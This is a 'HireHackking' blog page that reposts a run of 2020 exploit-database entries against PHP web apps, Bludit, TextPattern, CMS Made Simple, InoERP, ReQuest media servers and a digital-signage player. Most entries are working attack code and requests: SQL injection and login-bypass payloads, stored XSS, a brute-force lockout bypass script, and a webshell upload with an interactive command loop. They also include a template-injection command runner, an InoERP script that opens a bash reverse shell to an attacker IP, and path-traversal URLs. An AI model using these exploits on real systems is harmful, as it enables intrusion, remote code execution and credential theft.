Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863151822

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Gym Management System 1.0 - 'id' SQL Injection
# Date: 22/10/2020
# Exploit Author: Jyotsna Adhana
# Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14541&title=Gym+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

#parameter Vulnerable: id
# Injected Request

GET /gym/gym/manage_user.php?id=-1+UNION+ALL+SELECT+NULL,GROUP_CONCAT(database(),version()),NULL,NULL,NULL-- HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/gym/gym/index.php?page=users
Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re


//Comment
Above request will print database name and MariaDB version.
HireHackking 
# Exploit Title: Gym Management System 1.0 - Authentication Bypass
# Date: 21/10/2020
# Exploit Author: Jyotsna Adhana
# Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14541&title=Gym+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

Step 1: Open the URL http://localhost/gym/gym/login.php

Step 2: use payload jyot' or 1=1# in Username and Password field

Malicious Request

POST /gym/gym/ajax.php?action=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 55
Origin: http://localhost
Connection: close
Referer: http://localhost/gym/gym/login.php
Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D

username=jyot'+or+1%3D1+%23&password=jyot'+or+1%3D1+%23

Step 3: You will be logged in as admin.
HireHackking 
# Exploit Title: School Faculty Scheduling System 1.0 - 'username' SQL Injection
# Date: 22/10/2020
# Exploit Author: Jyotsna Adhana
# Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

#parameter Vulnerable: id
# Injected Request

GET /schoolFSS/scheduling/admin/manage_user.php?id=-2515+UNION+ALL+SELECT+NULL,GROUP_CONCAT(database(),version()),NULL,NULL,NULL-- HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/schoolFSS/scheduling/admin/index.php?page=users
Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D

//Comment
Above request will print database name and MariaDB version.
HireHackking 
#!/usr/bin/python3

# Exploit
## Title: Bludit <= 3.9.2 - Bruteforce Mitigation Bypass
## Author: ColdFusionX (Mayank Deshmukh)
## Author website: https://coldfusionx.github.io
## Date: 2020-10-19
## Vendor Homepage: https://www.bludit.com/
## Software Link: https://github.com/bludit/bludit/archive/3.9.2.tar.gz
## Version: <= 3.9.2

# Vulnerability
## Discoverer: Rastating
## Discoverer website: https://rastating.github.io/
## CVE: CVE-2019-17240 https://nvd.nist.gov/vuln/detail/CVE-2019-17240
## References: https://rastating.github.io/bludit-brute-force-mitigation-bypass/
## Patch: https://github.com/bludit/bludit/pull/1090

'''
Example Usage:
- ./exploit.py -l http://127.0.0.1/admin/login.php -u user.txt -p pass.txt 
'''

import requests
import sys
import re
import argparse, textwrap
from pwn import *

#Expected Arguments
parser = argparse.ArgumentParser(description="Bludit <= 3.9.2 Auth Bruteforce Mitigation Bypass", formatter_class=argparse.RawTextHelpFormatter, 
epilog=textwrap.dedent(''' 
Exploit Usage : 
./exploit.py -l http://127.0.0.1/admin/login.php -u user.txt -p pass.txt
./exploit.py -l http://127.0.0.1/admin/login.php -u /Directory/user.txt -p /Directory/pass.txt'''))                     

parser.add_argument("-l","--url", help="Path to Bludit (Example: http://127.0.0.1/admin/login.php)") 
parser.add_argument("-u","--userlist", help="Username Dictionary") 
parser.add_argument("-p","--passlist", help="Password Dictionary")    
args = parser.parse_args()

if len(sys.argv) < 2:
    print (f"Exploit Usage: ./exploit.py -h [help] -l [url] -u [user.txt] -p [pass.txt]")          
    sys.exit(1)  

# Variable
LoginPage = args.url
Username_list = args.userlist
Password_list = args.passlist

log.info('Bludit Auth BF Mitigation Bypass Script by ColdFusionX \n ')

def login(Username,Password):
    session = requests.session()          
    r = session.get(LoginPage)
 
# Progress Check    
    process = log.progress('Brute Force')

#Getting CSRF token value
    CSRF = re.search(r'input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="(.*?)"', r.text)
    CSRF = CSRF.group(1)

#Specifying Headers Value
    headerscontent = {
    'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
    'Referer' : f"{LoginPage}",
    'X-Forwarded-For' : f"{Password}"
    }

#POST REQ data
    postreqcontent = {
    'tokenCSRF' : f"{CSRF}",
    'username' : f"{Username}",
    'password' : f"{Password}"
    }

#Sending POST REQ
    r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False)

#Printing Username:Password            
    process.status('Testing -> {U}:{P}'.format(U = Username, P = Password))            

#Conditional loops    
    if 'Location' in r.headers:
        if "/admin/dashboard" in r.headers['Location']:
            print()
            log.info(f'SUCCESS !!')
            log.success(f"Use Credential -> {Username}:{Password}")
            sys.exit(0)
    elif "has been blocked" in r.text:
        log.failure(f"{Password} - Word BLOCKED")
        
#Reading User.txt & Pass.txt files
userfile = open(Username_list).readlines()
for Username in userfile:
    Username = Username.strip() 
   
passfile = open(Password_list).readlines()
for Password in passfile:
    Password = Password.strip()   
    login(Username,Password)
HireHackking 
# Exploit Title: Gym Management System 1.0 - Stored Cross Site Scripting
# Date: 21/10/2020
# Exploit Author: Jyotsna Adhana
# Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14541&title=Gym+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

Step 1: Open the URL http://localhost/gym/gym/index.php?page=packages

Step 2: use payload <script>alert(document.cookie)</script> in Package Name and Description field

Malicious Request
POST /gym/gym/ajax.php?action=save_package HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------10391575234966392972740129710
Content-Length: 587
Origin: http://localhost
Connection: close
Referer: http://localhost/gym/gym/index.php?page=packages
Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D

-----------------------------10391575234966392972740129710
Content-Disposition: form-data; name="id"


-----------------------------10391575234966392972740129710
Content-Disposition: form-data; name="package"

<script>alert(document.cookie)</script>
-----------------------------10391575234966392972740129710
Content-Disposition: form-data; name="description"

<script>alert(document.cookie)</script>
-----------------------------10391575234966392972740129710
Content-Disposition: form-data; name="amount"

1
-----------------------------10391575234966392972740129710--

Step 3: Cookie will be reflected each time someone visits the Packages section.
HireHackking 
#!/usr/bin/python3

# Exploit Title: TextPattern <= 4.8.3 - Authenticated Remote Code Execution via Unrestricted File Upload
# Google Dork: N/A
# Date: 16/10/2020
# Exploit Author: Michele '0blio_' Cisternino
# Vendor Homepage: https://textpattern.com/
# Software Link: https://github.com/textpattern/textpattern
# Version: <= 4.8.3
# Tested on: Kali Linux x64
# CVE: N/A

import sys
import json
import requests
from bs4 import BeautifulSoup as bs4
from time import sleep
import random
import string
import readline

# Disable SSL warnings
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

# Simple Terminal User Interface class I wrote to print run-time logs and headers
class Tui ():
    def __init__ (self):
        self.red = '\033[91m'
        self.green = '\033[92m'
        self.blue = '\033[94m'
        self.yellow = '\033[93m'
        self.pink = '\033[95m'
        self.end = '\033[0m'
        self.bold = '\033[1m'

    def header (self, software, author, cve='N/A'):
        print ("\n", "{}Software:{} {}".format(self.pink, self.end, software), sep='')
        print ("{}CVE:{} {}".format(self.pink, self.end, cve))
        print ("{}Author:{} {}\n".format(self.pink, self.end, author))

    def info (self, message):
        print ("[{}*{}] {}".format(self.blue, self.end, message))

    def greatInfo (self, message):
        print ("[{}*{}] {}{}{}".format(self.blue, self.end, self.bold, message, self.end))

    def success (self, message):
        print ("[{}✓{}] {}{}{}".format(self.green, self.end, self.bold, message, self.end))

    def warning (self, message):
        print ("[{}!{}] {}".format(self.yellow, self.end, message))

    def error (self, message):
        print ("[{}✗{}] {}".format(self.red, self.end, message))

log = Tui()
log.header (software="TextPattern <= 4.8.3", cve="CVE-2020-XXXXX - Authenticated RCE via Unrestricted File Upload", author="Michele '0blio_' Cisternino")

if len(sys.argv) < 4:
    log.info ("USAGE: python3 exploit.py http://target.com username password")
    log.info ("EXAMPLE: python3 exploit.py http://localhost admin admin\n")
    sys.exit()

# Get input from the command line
target, username, password = sys.argv[1:4]

# Fixing URL
target = target.strip()
if not target.startswith("https://") and not target.startswith("http://"):
    target = "http://" + target
if not target.endswith("/"):
    target = target + "/"

accessData = {'p_userid':username, 'p_password':password, '_txp_token':""}

# Login
log.info ("Authenticating to the target as '{}'".format(username))
s = requests.Session()
try:
    r = s.post(target + "textpattern/index.php", data=accessData, verify=False)
    sleep(1)
    if r.status_code == 200:
        log.success ("Logged in as '{}' (Cookie: txp_login={}; txp_login_public={})".format(username, s.cookies['txp_login'], s.cookies['txp_login_public']))
        sleep(1)

        # Parsing the response to find the upload token inside the main json array
        log.info ("Grabbing _txp_token (required to proceed with exploitation)..")
        soup = bs4(r.text, 'html.parser')
        scriptJS = soup.find_all("script")[2].string.replace("var textpattern = ", "")[:-2]
        scriptJS = json.loads(scriptJS)
        uploadToken = scriptJS['_txp_token']
        log.greatInfo ("Upload token grabbed successfully ({})".format(uploadToken))

    # The server reply with a 401 with the user provide wrong creds as input
    elif r.status_code == 401:
        log.error ("Unable to login. You provided wrong credentials..\n")
        sys.exit()
except requests.exceptions.ConnectionError:
    log.error ("Unable to connect to the target!")
    sys.exit()

# Crafting the upload request here
headers = {
    "User-Agent" : "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "Accept" : "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01",
    "Accept-Encoding" : "gzip, deflate",
    "X-Requested-With" : "XMLHttpRequest",
    "Connection" : "close",
}

# Generating random webshell name
randomFilename = ''.join(random.choice(string.ascii_letters) for i in range(10)) + '.php'

# Mapping multiparts here
multipart_form_data = {
    "fileInputOrder" : (None, '1/1'),
    "app_mode" : (None, 'async'),
    "MAX_FILE_SIZE" : (None, '2000000'),
    "event" : (None, 'file'),
    "step" : (None, 'file_insert'),
    "id" : (None, ' '),
    "_txp_token" : (None, uploadToken), # Token here
    "thefile[]" : (randomFilename, '<?php system($_GET["efcd"]); ?>') # lol
}

# Uploading the webshell
log.warning ("Sending payload..")

try:
    r = s.post (target + "textpattern/index.php?event=file", verify=False, headers=headers, files=multipart_form_data)
    if "Files uploaded" in r.text:
        log.success ("Webshell uploaded successfully as {}".format(randomFilename))
except:
    log.error ("Unexpected error..")
    sys.exit()

sleep(2)

# Interact with the webshell (using the readline library to save the history of the executed commands at run-time)
log.greatInfo ("Interacting with the HTTP webshell..")
sleep (1)
print()

while 1:
    try:
        cmd = input ("\033[4m\033[91mwebshell\033[0m > ")
        if cmd == 'exit':
            raise KeyboardInterrupt
        r = requests.get (target + "files/" + randomFilename + "?efcd=" + cmd, verify=False)
        print (r.text)
    except KeyboardInterrupt:
        log.warning ("Stopped.")
        exit()
    except:
        log.error ("Unexpected error..")
        sys.exit()

print()
HireHackking 
# Exploit Title: CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection
# Google Dork: N/A
# Date: 11/10/2017
# Exploit Author: Gurkirat Singh <tbhaxor@gmail.com>
# Vendor Homepage: http://www.cmsmadesimple.org/
# Software Link: N/A
# Version: 2.1.6
# Tested on: Linux
# CVE : CVE-2017-16783
# POC : https://www.netsparker.com/blog/web-security/exploiting-ssti-and-xss-in-cms-made-simple/

PFA
-------
Gurkirat Singh
(tbhaxor <https://google.com/search?q=tbhaxor>)

from argparse import ArgumentParser, RawTextHelpFormatter
from urllib.parse import urlparse, parse_qs, urlencode, quote, unquote_plus
import requests as http
import re
from bs4 import BeautifulSoup, Tag
from huepy import *
parser = ArgumentParser(description="Exploit for CVE-2017-16783",
                        formatter_class=RawTextHelpFormatter)
parser.add_argument(
    "--target",
    "-t",
    help="complete remote target with protocol, host, path and query",
    required=True,
    dest="t")
parser.add_argument("--command",
                    "-c",
                    help="command to execute (default: whoami)",
                    default="whoami",
                    dest="c")
args = parser.parse_args()

print(info("Building malicious url"))
url = urlparse(args.t)
query = parse_qs(url.query)
query["cntnt01detailtemplate"] = [
    "string:{php}echo `echo tbhaxor;%s;echo tbhaxor`;{/php}" % args.c
]
query = {k: ",".join(v) for k, v in query.items()}
query = unquote_plus(urlencode(query, doseq=False))
_url = url.scheme + "://" + url.netloc + url.path + "?" + query
print(good("Done"))
print(info("Executing payload"))
r = http.get(_url)
html = BeautifulSoup(r.content.decode(), "html5lib")
main: Tag = html.find("article", {"id": "main"})
main = re.sub(r"^Home", "", main.text.strip()).replace("tbhaxor", "").strip()
print(good("Done"))
print(info("Result"))
print(main)
HireHackking 
# Exploit Title: Online Health Care System 1.0 - Multiple Cross Site Scripting (Stored)
# Google Dork: N/A
# Date: 2020/10/24
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://www.sourcecodester.com/php/14526/online-health-care-system-php-full-source-code-2020.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/healthcare_0.zip
# Version: 1.0
# Tested on: XAMPP 
# CVE : N/A

Vulnerable Pages:
http://localhost/healthcare/Users/registration.php
http://localhost/healthcare/Doctor/doctor_registration.php

Proof of Concept:

1 - Go to vulnerable pages and fill the "First Name" and "Last Name" blanks with <script>alert(1)</script> payload.

2 - And check user/doctor account on admin panel or http://localhost/healthcare/admin/user_detail.php?id=<userid> adres.
HireHackking 
# Exploit Title: Persistent XSS in SSID
# Date: 10/24/2020
# Exploit Author: Amal Mohandas
# Vendor Homepage: https://genexis.co.in/product/ont/
# Version: Platinum-4410 Software version - P4410-V2-1.28
# Tested on: Windows 10

Vulnerability Details
======================
Genexis Platinum-4410 Home Gateway Router is vulnerable to stored XSS
in the SSID parameter. This could allow attackers to perform malicious
action in which the XSS popup will affect all privileged users.

How to reproduce
===================
1. Login to the firmware as any user
2. Navigate to Net tab--> WLAN
3. Enter below mentioned payload in "SSID" text box
<script>alert(1)</script>
4. Click on the "OK" button.
5. Relogin as any user and again navigate to Net tab--> WLAN
6. Observe the XSS popup showing persistent XSS
HireHackking 
#!/usr/bin/python
# -*- coding: UTF-8 -*-

# Exploit Title: InoERP 0.7.2  Unauthenticated Remote Code Execution
# Date: March 14, 2020
# Exploit Author: Lyhin's Lab
# Detailed Bug Description: https://lyhinslab.org/index.php/2020/03/14/inoerp-ab-rce/
# Software Link: https://github.com/inoerp/inoERP
# Version: 0.7.2 
# Tested on: Ubuntu 19

import requests
import os
import sys

if len (sys.argv) != 4:
	print ("specify params in format: python inoerp.py target_url attacker_ip listening_port")
else:
        target_url = sys.argv[1]
	attacker_ip = sys.argv[2]
	listening_port = sys.argv[3]
	target_url += "/modules/sys/form_personalization/json_fp.php"
	target_headers = {"Accept": "*/*", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest"}
	code = "<?php\nexec(\"/bin/bash -c 'bash -i >& /dev/tcp/{}/{} 0>&1'\");".format(attacker_ip, listening_port)
	expl_data = {"get_fp_from_form": "true", "template_code": code, "obj_class_name": ''}

	requests.post(target_url, headers=target_headers, data=expl_data)
	print ("Check your listener.")
HireHackking 
# Exploit Title: PDW File Browser <= v1.3 - Cross-Site Scripting (XSS)
# Date: 24-10-2020
# Exploit Author: David Bimmel
# Researchers: David Bimmel, Joost Vondeling, Ramòn Janssen
# Vendor Homepage: n/a
# Software Link: https://github.com/GuidoNeele/PDW-File-Browser
# Version: <=1.3

The PDW File Browser is a plugin for the TinyMCE and CKEditor WYSIWYG editors. The PDW File Browser contains a stored and Reflected XSS vulnerability which results in code execution within the browser of an authenticated user. This vulnerability can be exploited when an authenticated user visits the crafted URL (i.e. when phished or when visiting a website containing the URL).

Stored XSS:
The stored XSS is a result of insufficient input sanitization within the 'rename' functionality within the PDW file browser. 
Below I have provided an example request were the filename (FILE.txt) is replaced with an XSS payload (<svg onload=alert(document.cookies)>). The payload gets executed when any authenticated user navigates to the PDW File browser page.

POST /ckeditor/plugins/pdw_file_browser/actions.php
HTTP/1.1 Host: <HOSTNAME>
[…]
action=rename&new_filename=<svg+onload=alert(document.cookie
s)>&old_filename=script%253EFILE.txt&folder=%252Fmedia%252F&typ
e=file

Reflected XSS:
The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload.

https://<HOSTNAME>/ckeditor/plugins/pdw_file_browser/file_spe
cs.php?ajax=true&path=%3Csvg+onload=alert(document.cookies)%
3E&type=file



Happy Hacking :^)
HireHackking 
# Exploit Title: ReQuest Serious Play F3 Media Server 7.0.3 - Debug Log Disclosure
# Exploit Author: LiquidWorm
# Software Link: http://request.com/
# Version: 3.0.0

ReQuest Serious Play F3 Media Server 7.0.3 Debug Log Disclosure


Vendor: ReQuest Serious Play LLC
Product web page: http://www.request.com
Affected version: 7.0.3.4968 (Pro)
                  7.0.2.4954
                  6.5.2.4954
                  6.4.2.4681
                  6.3.2.4203
                  2.0.1.823

Summary: F3 packs all the power of ReQuest's multi-zone serious Play servers
into a compact powerhouse. With the ability to add unlimited NAS devices, the
F3 can handle your entire family's media collection with ease.

Desc: The unprotected web management server is vulnerable to sensitive information
disclosure vulnerability. An unauthenticated attacker can visit the message_log
page and disclose the webserver's Python debug log file containing system information,
credentials, paths, processes and command arguments running on the device.

Tested on: ReQuest Serious Play® OS v7.0.1
           ReQuest Serious Play® OS v6.0.0
           Debian GNU/Linux 5.0
           Linux 3.2.0-4-686-pae
           Linux 2.6.36-request+lenny.5
           Apache/2.2.22
           Apache/2.2.9
           PHP/5.4.45
           PHP/5.2.6-1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience


Advisory ID: ZSL-2020-5600
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5600.php


01.08.2020

--


$ curl http://192.168.1.17/message_log

...
...
Oct 14 09:17:05 [debug] mediaman[pid 3635, tid -1590039696]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000001/.request/upload
Oct 14 09:17:05 [debug] mediaman[pid 3635, tid -1581646992]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000002/.request/upload
Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1403303056]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000003/.request/upload
Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1610613904]: (mediaman.py/11576) Message Response (mrespgetdir): /fat32/c/upload
Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1619006608]: (mediaman.py/11576) Message Response (mrespgetdir): Failed - no such directory
Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1285805200]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000001/.request/upload
Oct 14 09:17:36 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3110) Mount NAS: /home/arq/bin/mountnas.py -n 3 '192.168.1.17' 'Movies' -u 'admin' -p 'zePassw0rd' 2>/dev/null
Oct 14 09:17:48 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3113) Mount NAS verify: df /MP3/NAS000000003 2>/dev/null
Oct 14 09:19:19 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3110) Mount NAS: /home/arq/bin/mountnas.py -n 3 '192.168.1.17' 'Movies' -u 'admin' -p 'zePassw0rd' 2>/dev/null
Oct 14 09:19:32 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3113) Mount NAS verify: df /MP3/NAS000000003 2>/dev/null
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.397037 ('Update News Feed'): /home/arq/bin/widget/news_feed.py
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.401558 ('Update Stock Feed'): /home/arq/bin/widget/stock_feed.py
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/181) Skipping a command ('Check if squeezeplay was properly started'); condition doesn't match
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.408094 ('Probe for CP2101'): /home/arq/bin/cp2101_probe.sh
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.409664 ('Update Weather Feed'): /home/arq/bin/widget/weather_feed.py
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.413391 ('Check for Network Configuration changes'): /home/arq/bin/check_netconf.sh
Oct 14 09:20:25 [warning] BrowserProtocolClient_15[pid 11532, tid -1544549520]: (pandoralist.py/282) No Pandora user configured.
Oct 14 09:20:35 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681635.425757 ('Ask all currently-attached IMCs to answer a rollcall'): /home/arq/bin/imcRollcall.sh
Oct 14 09:20:35 [debug] ini[pid 12089, tid -1251767440]: (iniengine.py/621) Setting MPP30345_STATUS:Rollcall to 1602681635.45
...
...
HireHackking 
# Exploit Title: ReQuest Serious Play Media Player 3.0 - Directory Traversal File Disclosure Vulnerability
# Exploit Author: LiquidWorm
# Software Link: http://request.com/
# Version: 3.0.0

ReQuest Serious Play Media Player 3.0 Directory Traversal File Disclosure Vulnerability


Vendor: ReQuest Serious Play LLC
Product web page: http://www.request.com
Affected version: 3.0.0
                  2.1.0.831
                  1.5.2.822
                  1.5.2.821
                  1.5.1.820

Summary: With the MediaPlayer, ReQuest delivers video content and award-winning
distributed music capabilities. Up to 4 MediaPlayers (15 when coupled with an
approved NAS) can be connected through your home network to your ReQuest system,
delivering HD video to your television in 1080p via HDMI outputs.

Desc: The device suffers from an unauthenticated file disclosure vulnerability
when input passed through the 'file' parameter in tail.html and file.html script
is not properly verified before being used to read web log files. This can be
exploited to disclose contents of files from local resources.

===============================================================================
/tail.html:
-----------

function load_data()
{

   var elem = $("#data");
   $.ajax({url:"tail.html", 
           data:{
                 file:elem.attr("file"),
                 start:elem.attr("nextstart"),
                 tail:elem.attr("tail")?elem.attr("tail"):undefined,
                 max:elem.attr("max")?elem.attr("max"):undefined},
                 cache:false,
                 async:true,
                 success:show_data}
                 );
}

function main_start()
{

   $("#data").attr({"nextstart": 0, "max": "", "tail": 10000, "update": 5, "file": "C:\\\\ReQuest\\\\mpweb\\log\\mpweb.log"});
   window.setTimeout(load_data, 1);
}

function show_data(data, status, jqxhr)
{
   var data = $("filedata", data);
   var newdata = data.attr("data");
   var start = data.attr("start");
   var nextstart = data.attr("nextstart");
   var elem = $("#data");
   var at_end = ($(document).scrollTop()>=$(document).height()-window.innerHeight-20);
   elem.attr({tail:"", start:start, nextstart:nextstart});
   if (newdata.length)
      elem.append(htmlspecialchars(newdata));
   var delay = parseFloat(elem.attr("update"))*1000;
   if (isNaN(delay))
      delay = 5000;
   if (at_end)
      $("html,body").scrollTop($(document).height());
   window.setTimeout(load_data, delay);
}

$(document).ready(main_start);

===============================================================================

Tested on: ReQuestHTTP/0.1 httpserver/0.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5599
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5599.php


01.08.2020

--


http://192.168.1.17:8001/tail.html?file=C:\\ReQuest\\mpweb\httpserver.py
http://192.168.1.17:8001/file.html?file=C:\windows\win.ini
HireHackking 
# Exploit Title: TDM Digital Signage PC Player 4.1 - Insecure File Permissions
# Date: 2020-09-23
# Exploit Author: LiquidWorm
# Software Link: https://www.tdmsignage.com / https://pro.sony/en_NL/products/display-software/tdm-ds1y-tdm-ds3y
# Version: 4.1.0.4

Vendor: TDM [Trending Digital Marketing]
Product web page: https://www.tdmsignage.com
                  https://pro.sony/en_NL/products/display-software/tdm-ds1y-tdm-ds3y
Affected version: 4.1.0.4

Summary: With TDM you can do a lot more than just show Digital Signage.
With our Enterprise-Grade software you open the door to Interactive Signage,
Analytics, Proof of Play and a lot more.

Desc: TDM Digital Signage Windows Player suffers from an elevation of
privileges vulnerability which can be used by a simple authenticated
user that can change the executable file with a binary of choice. The
vulnerability exist due to the improper permissions, with the 'M' flag
(Modify) or 'C' flag (Change) for 'Authenticated Users' group.

Tested on: Microsoft Windows 10 Home


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5604
